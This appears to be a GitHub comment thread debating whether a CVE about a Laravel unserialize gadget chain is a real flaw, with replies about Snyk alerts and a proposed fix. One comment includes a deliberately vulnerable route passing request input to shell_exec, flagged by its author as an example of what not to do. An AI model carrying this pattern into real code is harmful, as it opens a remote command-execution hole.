Copy link

** **pqlx** commented May 17, 2022 •**

I think there should be some serious thought about revoking this CVE.

As pointed out, there is no security boundary being breached here. Passing arbitrary data to unserialize has always been classified as "unsafe". That the Laravel core framework just happens to have a few classes that you could readily use in such a scenario does not constitute a vulnerability on their part.

Besides, there's no real fix for people using unserialize inappropriately anyway. As @klezVirus points out, it's analogous to something like ROP gadgets. (Framework) developers can keep patching their classes to not do stuff in e.g. __construct or __destruct, but besides making code more complex (and maybe eliminating low-hanging fruit), there are always going to be more complex chains that give the attacker more control. It is a fundamental issue with unserialize.

> So having code execution on unserialize is a feature ?

No it's not. But it's not necessarily a vulnerability either. If someone were to pass unsafe user input into an exec() call, that would be a vulnerability in that persons code, but it's not a vulnerability within PHP.

If there are any usages in the Laravel core framework that actually has code akin to this, then yeah it should be a CVE. But since it does not seem to be so, this is not any more of a vulnerability in Laravel as the following is:

// Obviously DON'T actually do this in a real app
Route::get('/', function (\\Illuminate\\Http\\Request $request) {
    echo shell\_exec($request\->input('name'));
});

While my example above for sure is a vulnerability in my code (if it was actually deployed), it's not a vulnerability within Laravel, or even PHP.

@caendesilva I'd argue comparing exec to unserialize is an apples to oranges comparison and not really the best analogy for what is happening here.

While I agree it's not best practice to pass untrusted user input to unserialize, doing that alone does not automatically create a path for exploitation.

So just to clarify as we also got the snyk alert. The vulnerability here is that there exists a class in Laravel which will do code execution when called, but that the only route to call it is via unserialize which is not passed untrusted user input in laravel itself. So it isn't reachable unless a user (developer) calls unserialize() on untrusted input which is bad idea anyway (according to the docs and common sense).

I'm here too because of snyk. Is there any solution to this?

> I'm here too because of snyk. Is there any solution to this?

@oreillysean Check your code for any areas that might use unserialize and accept user input. If none are found you can mark it as ignored in Synk since it's not applicable to you.

this is for Laravel 9.1.8 only ?  
if yes, Snyk raised a false alert for my 8.83.12 Laravel ?

> @GlitchWitch yes I agree with you. However would this not fix the issue as stated in the CVE oreillysean/framework@57c5f57

I haven't had a chance to test, but perhaps it would be worth submitting your proposed fix as a PR for the Laravel team to review.

Tag

#rce